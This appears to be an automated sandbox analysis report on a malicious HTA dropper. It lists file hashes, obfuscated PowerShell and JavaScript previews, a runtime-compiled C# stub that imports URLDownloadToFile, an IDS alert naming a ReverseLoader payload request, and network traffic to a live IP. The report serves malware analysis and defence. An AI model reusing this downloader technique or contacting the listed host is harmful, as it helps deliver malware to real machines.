                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (429), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):166446
                                                                    Entropy (8bit):3.894631434751547
                                                                    Encrypted:false
                                                                    SSDEEP:3072:zPTYr5SAsQ5NIUHFlPTYr5SAsQ5NIUH5PTYr5SAsQ5NIUH2:zPTs5SANIUllPTs5SANIUZPTs5SANIUW
                                                                    MD5:33ACA5E4AA52362C54EA2A709581C47B
                                                                    SHA1:5FE650034F1FBE7C15477ECD16D2E95D14505C4A
                                                                    SHA-256:832FCD0838977003D89333EC7A0EAE20E9B00BB5DA21047F93FBECC793B2A03E
                                                                    SHA-512:64AA6372746DCD76178A0759CB12C95F31F31B748D8403CF7083512C6F606B065B78850EAED6BBECFCB7FCF1DE6C32A8B6CF5D620B0969E554A2378F6A2F3F61
                                                                    Malicious:false
                                                                    Preview:..........K.L.c.v.K.W.Z.L.L.B.G.B.g.i.L. .=. .".K.W.t.r.i.c.l.i.n.i.a.r.c.h.a.L.j.x.m.q.A.c.A.U.a.r.".....g.b.h.x.G.P.p.K.m.U.o.b.W.Q.p. .=. .".c.c.W.b.N.W.k.O.k.i.L.U.i.H.A.".....S.A.K.N.t.n.e.k.A.P.U.W.L.z.z. .=. .".b.W.K.i.B.K.h.H.G.e.d.d.C.K.b.".....m.W.a.J.a.m.o.P.p.v.Z.h.N.i.k. .=. .".z.o.S.A.K.n.d.O.e.W.q.G.O.L.c.".....K.C.I.L.a.b.R.x.P.J.W.t.G.u.g. .=. .".S.H.f.g.J.R.L.e.c.Z.P.c.i.r.i.".....K.c.b.L.x.L.p.a.c.t.h.u.W.b.Z. .=. .".I.p.h.W.p.m.h.g.G.B.d.K.J.q.B.".........L.d.G.W.A.a.h.k.c.P.L.L.k.W.P. .=. .".A.L.K.f.W.b.z.c.K.G.m.O.J.m.W.".....c.K.i.Q.W.W.n.v.I.L.l.L.W.C.u. .=. .".W.Z.m.G.q.q.L.t.i.L.Z.R.K.J.c.".....t.p.c.W.P.n.P.W.G.H.P.d.O.m.K. .=. .".o.R.R.C.N.W.e.U.e.L.z.L.v.p.O.".........s.U.A.l.H.k.x.L.g.G.K.k.o.c.u. .=. .".k.i.m.A.j.I.i.e.x.L.q.P.l.x.u.".....Z.l.L.A.i.K.T.p.c.R.K.L.I.K.i. .=. .".K.g.W.h.p.d.B.a.K.K.L.h.K.C.u.".....o.m.L.L.m.L.C.j.z.U.L.z.L.B.A. .=. .".W.m.u.W.v.B.W.g.L.z.h.O.h.c.L.".....j.c.q.S.W.c.O.Z.W.p.N.A.i.u.t. .=. .".d.z.G.h.L.Z.h.L.A.J.k.W.N.h.W."...
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.773832331134527
                                                                    Encrypted:false
                                                                    SSDEEP:3:NlllulI:NllU
                                                                    MD5:132C26A05F791EF716632B05AFDD4127
                                                                    SHA1:36CABE22E212DA474C7CFA2BE6EA2FDDA847B26C
                                                                    SHA-256:D91AC8ABA939D15BFA7B1138AF2203B931BD05180CE599FDA34F26B06BD14044
                                                                    SHA-512:4D80C1BD6BCC1358A59C1056CA12026752EAF29CD7014B6D0ABF1228CDAF042A573344C002937EE218701055B7824A6ED6F1E1394188A86AD468060040BBC7A4
                                                                    Malicious:false
                                                                    Preview:@...e.................................6.S.......................
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Nov 28 19:41:45 2024, 1st section name ".debug$S"
                                                                    Category:dropped
                                                                    Size (bytes):1328
                                                                    Entropy (8bit):3.97343451823
                                                                    Encrypted:false
                                                                    SSDEEP:24:H3e9EuZfZzgvXDfHfwKEbsmfII+ycuZhNhakSfPNnqSqd:uBZUvzIKPmg1ulha39qSK
                                                                    MD5:E5FC8A183163E6117414BEC7C617FD2F
                                                                    SHA1:A7267BAF0ED004448C3388060A9F0A6004B10B7A
                                                                    SHA-256:21F16C44632B194F45112AAD7B03AB0949CFDD8EC182D39082A220710E8EEAAA
                                                                    SHA-512:54CA7262A59EB6E2BC24B1DD66F1A8BD5BF5CEC03DC740FC77E983E03E7370DF998680F5BA8B024F6C49FB45F89261983212A045E08C5377D781DBA5BED94277
                                                                    Malicious:false
                                                                    Preview:L...y.Hg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\dk54el2n\CSC71BE0DF5A47E408EAC9C81C5574F338.TMP.................QS.,.|2..."m............4.......C:\Users\user\AppData\Local\Temp\RES9C55.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.k.5.4.e.l.2.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):652
                                                                    Entropy (8bit):3.0967353607069756
                                                                    Encrypted:false
                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTak7YnqqfPN5Dlq5J:+RI+ycuZhNhakSfPNnqX
                                                                    MD5:C35153AD2CD87C32C5A51EBF226DF9C0
                                                                    SHA1:C53EC7A5143186E6F4CC04DB9E81B665C907AB53
                                                                    SHA-256:A6856219C3A23A3B49ECF72AD94596D76EA1E13A5C2F890700A65E04C40DD165
                                                                    SHA-512:36DD970454C083CBAE3BFB358686B44C08038ED2FA02CF247CBD83A0E96DC6C312996402F6D95A0BD661E4D40FE92C0C6E520A6DD8D69F852C82963B88ACE3D7
                                                                    Malicious:false
                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.k.5.4.e.l.2.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.k.5.4.e.l.2.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                    Category:dropped
                                                                    Size (bytes):474
                                                                    Entropy (8bit):3.855329279868913
                                                                    Encrypted:false
                                                                    SSDEEP:6:V/DsYLDS81zuMUhDoLkmMenQXReKJ8SRHy4HKKm7w+5bmJ7y:V/DTLDfuuLGXfHOnH5CFy
                                                                    MD5:1C21E300AA84E974598ED1030235CED2
                                                                    SHA1:291AF9A40735B871EF010A3D5318EDE7C831D931
                                                                    SHA-256:3E868570530D620E7562624BF45CB78C040D2152A5971C70ADE1E1F8AF86F6FF
                                                                    SHA-512:1B2BA5972F35A490AFC594B217065694972C513C1FA29ED38B68C21081BBF1E58CCC21D97297EC0F43710256B67BFF8D97B749AB59B7DB1E666E3F402316FFBE
                                                                    Malicious:false
                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace Aw.{. public class jLbfTJrSIuj. {. [DllImport("uRLMon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr FNpJIKp,string yGOsLMc,string rAnbPN,uint XnVbrC,IntPtr khzsGiOK);.. }..}.
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):369
                                                                    Entropy (8bit):5.261504820135317
                                                                    Encrypted:false
                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fhoCE2J0zxs7+AEszIwkn23fhoCE2IA:p37Lvkmb6KRfZxE60WZEifZxEo
                                                                    MD5:D2E42983ABC33570725D24B8AB56C099
                                                                    SHA1:C8A94E8CD76C0E3D6BAD2473971293A9792669D8
                                                                    SHA-256:9745E6FB8F701DFB8F7F8BBC39C965D5A66245C5D296B396AFFA29E9F0495096
                                                                    SHA-512:2CDC59A56985953FD2D6E7E0BA01945A371BF4AFD0CDC1FCFC946AA7E0A537BFF1DE3959F4D94DBC27CDF4AEC5012483D4C33BADBE893C13D10D41832ACFA6CD
                                                                    Malicious:true
                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.0.cs"
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3072
                                                                    Entropy (8bit):2.8446639075646774
                                                                    Encrypted:false
                                                                    SSDEEP:24:etGSVPBe5ekrl8stgkclqnh+tbs6PtkZfP5bCZ0WI+ycuZhNhakSfPNnq:6Oskr+9l3tAJP5bCZX1ulha39q
                                                                    MD5:640349C4E1B5E19817492531EBA77533
                                                                    SHA1:E7DDD790991387ABA0D4AC1A724A92FC91AEC367
                                                                    SHA-256:9EF78F1BE01D7984E9E6B26E8F4CA41CD3669249CB2BD066466FBDB6DAEF1DF2
                                                                    SHA-512:8D1676032A4D2FEF4E82970E69934791A1BC657CF3DD8071BE8C3D1D0207FB70405F3AF003C6B7F9386EDBB35CA6D14578080CA0C7B3AF062D57B407596D80FC
                                                                    Malicious:false
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y.Hg...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....|.....|...........................#.............. =.....P ......O.........U.....].....e.....l.....s...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.dk
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):867
                                                                    Entropy (8bit):5.319871749084265
                                                                    Encrypted:false
                                                                    SSDEEP:24:KJBqd3ka6KRfZFEifZEKax5DqBVKVrdFAMBJTH:Cika6CZFEuZEK2DcVKdBJj
                                                                    MD5:DE6AF51826C479011E2FB70F03EE03AE
                                                                    SHA1:CAF4D0A39DB72B1E9F481D0ADDC659E8FFF37844
                                                                    SHA-256:5555908D1EA4DE4EC9AEE568FD193A41140C364F630FD27E9DD43B861676B8CE
                                                                    SHA-512:DB9296E252401CE03B3D5C8F2CC992FA16A70456224519499BDA92BB53880B81412CB47CB89C651922805B683565D677D493050A514601A1A2247DCD5EBEA6CD
                                                                    Malicious:false
                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (429), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):166446
                                                                    Entropy (8bit):3.894631434751547
                                                                    Encrypted:false
                                                                    SSDEEP:3072:zPTYr5SAsQ5NIUHFlPTYr5SAsQ5NIUH5PTYr5SAsQ5NIUH2:zPTs5SANIUllPTs5SANIUZPTs5SANIUW
                                                                    MD5:33ACA5E4AA52362C54EA2A709581C47B
                                                                    SHA1:5FE650034F1FBE7C15477ECD16D2E95D14505C4A
                                                                    SHA-256:832FCD0838977003D89333EC7A0EAE20E9B00BB5DA21047F93FBECC793B2A03E
                                                                    SHA-512:64AA6372746DCD76178A0759CB12C95F31F31B748D8403CF7083512C6F606B065B78850EAED6BBECFCB7FCF1DE6C32A8B6CF5D620B0969E554A2378F6A2F3F61
                                                                    Malicious:true
                                                                    Preview:..........K.L.c.v.K.W.Z.L.L.B.G.B.g.i.L. .=. .".K.W.t.r.i.c.l.i.n.i.a.r.c.h.a.L.j.x.m.q.A.c.A.U.a.r.".....g.b.h.x.G.P.p.K.m.U.o.b.W.Q.p. .=. .".c.c.W.b.N.W.k.O.k.i.L.U.i.H.A.".....S.A.K.N.t.n.e.k.A.P.U.W.L.z.z. .=. .".b.W.K.i.B.K.h.H.G.e.d.d.C.K.b.".....m.W.a.J.a.m.o.P.p.v.Z.h.N.i.k. .=. .".z.o.S.A.K.n.d.O.e.W.q.G.O.L.c.".....K.C.I.L.a.b.R.x.P.J.W.t.G.u.g. .=. .".S.H.f.g.J.R.L.e.c.Z.P.c.i.r.i.".....K.c.b.L.x.L.p.a.c.t.h.u.W.b.Z. .=. .".I.p.h.W.p.m.h.g.G.B.d.K.J.q.B.".........L.d.G.W.A.a.h.k.c.P.L.L.k.W.P. .=. .".A.L.K.f.W.b.z.c.K.G.m.O.J.m.W.".....c.K.i.Q.W.W.n.v.I.L.l.L.W.C.u. .=. .".W.Z.m.G.q.q.L.t.i.L.Z.R.K.J.c.".....t.p.c.W.P.n.P.W.G.H.P.d.O.m.K. .=. .".o.R.R.C.N.W.e.U.e.L.z.L.v.p.O.".........s.U.A.l.H.k.x.L.g.G.K.k.o.c.u. .=. .".k.i.m.A.j.I.i.e.x.L.q.P.l.x.u.".....Z.l.L.A.i.K.T.p.c.R.K.L.I.K.i. .=. .".K.g.W.h.p.d.B.a.K.K.L.h.K.C.u.".....o.m.L.L.m.L.C.j.z.U.L.z.L.B.A. .=. .".W.m.u.W.v.B.W.g.L.z.h.O.h.c.L.".....j.c.q.S.W.c.O.Z.W.p.N.A.i.u.t. .=. .".d.z.G.h.L.Z.h.L.A.J.k.W.N.h.W."...
                                                                    File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                    Entropy (8bit):2.0035970583268288
                                                                    TrID:
                                                                      File name:seemebestthings.hta
                                                                      File size:204'989 bytes
                                                                      MD5:b89e0d07bac575aa9381611fa00ea4a0
                                                                      SHA1:53a71effb8401e97f8e8e1f2522a0289e2b58745
                                                                      SHA256:6bfa3b21293ad79037e13886fd6b0b3c0ee8afdc1422ba2748ade815db010aa7
                                                                      SHA512:825a4c2a185a039b92cc5babf6797e6bde8fffe64b2f04de45d20f85471c5f8a2c2c2dde476b7c4e85029d21b2a291a3a70dcaad76563aad5e98d29bac9dd644
                                                                      SSDEEP:1536:RZ7yLk8TCV/QtwkHTCV/Qta9LiBPxBfOrXa9zDzFzDzbfQP/OkOk0TCV/QtOky:RV
                                                                      TLSH:D514AB41E93440EDFAFD5EABB5BDB44E35B423179BC99D894227FB80D8A334EA4408C1
                                                                      File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253CScript%252520Language%25253D%252527Javascript%252527%25253E%25250A%25253C%252521--%252520HTML%252520Encryption%252520pr
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-28T18:50:24.269477+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.449730172.245.123.2980TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 28, 2024 18:50:23.038057089 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:23.161339045 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:23.161442041 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:23.161623955 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:23.281578064 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269381046 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269402027 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269412994 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269432068 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269443035 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269476891 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.269524097 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.269573927 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269587040 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269599915 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269612074 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269613028 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.269623995 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.269648075 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.269675970 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.393755913 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.393850088 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.393888950 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.394313097 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.397856951 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.397910118 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.461261034 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.461292028 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.461339951 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.461380005 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.465418100 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.465475082 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.466943026 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.467030048 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.467039108 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.467087030 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.475474119 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.475543976 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.475564957 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.475589991 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.483850002 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.483930111 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.483931065 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.483983994 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.492311001 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.492348909 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.492386103 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.492403984 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.500706911 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.500761986 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.500818014 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.500864029 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.509110928 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.509150028 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.509170055 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.509192944 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.517479897 CET8049730172.245.123.29192.168.2.4
                                                                      Nov 28, 2024 18:50:24.517544031 CET4973080192.168.2.4172.245.123.29
                                                                      Nov 28, 2024 18:50:24.517553091 CET8049730172.245.123.29192.168.2.4
